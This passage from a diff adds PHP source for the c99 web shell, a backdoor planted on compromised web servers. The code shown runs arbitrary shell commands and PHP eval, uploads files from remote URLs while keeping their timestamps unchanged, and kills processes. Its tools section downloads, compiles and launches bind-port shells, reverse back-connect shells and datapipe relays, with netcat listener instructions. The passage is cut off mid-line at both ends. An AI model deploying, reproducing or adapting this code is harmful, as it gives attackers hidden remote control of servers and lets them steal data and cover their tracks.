$destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br> or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4> convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "<b>Result of execution this command</b>:<br>"; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== false) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\"> <a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> <a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a> ".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a> ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + //Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 0; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 0; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\"> <input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\"> <input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\"> <input type=submit name=\"actpastebuff\" value=\"Paste\"> <input type=submit name=\"actemptybuff\" value=\"Empty buffer\"> "; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select> <input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} +if ($act == "tools") +{ + $bndportsrcs = array( + "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), + "c99sh_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "c99sh_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "<b>Result of binding port:</b><br>"; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat©, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";} + } + echo "<br>"; + } + } + if (!empty($bcsubmit)) + { + echo "<b>Result of back connection:</b><br>"; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>"; + } + } + } + if (!empty($dpsubmit)) + { + echo "<b>Result of datapipe-running:</b><br>"; + $v = $dpsrcs[$datapipe["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} + else + { + $srcpath = $tmpdir.$datapipe["src"]; + $w = explode(".",$datapipe["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat©, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";} + } + echo "<br>"; + } + } + ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>"> Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>"> <select name="bind[src]"><?php + foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";} + ?></select> <input type=submit name=bindsubmit value="Bind"></form> +<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>"> Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>"> <select name="bc[src]"><?php +foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} +?></select> <input type=submit name=bcsubmit value="Connect"></form> +Click "Connect" only after open port for it. You should use NetCat©, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br> +<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>"> Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>"> <select name="datapipe[src]"><?php +foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} +?></select> <input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php +} +if ($act == "processes") +{ + echo "<b>Processes:</b><br>"; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} + $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode(" ",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode(" ",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo "</tr>"; + } + } + } + $head[$k] = "<b>".$head[$k]."</b>".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + foreach($tab as $i=>$k) + { + echo "<tr>"; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} + echo "</tr>"; + } + echo "</table>"; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>Result of execution this PHP-code</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + } + else + { + if ($eval_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if 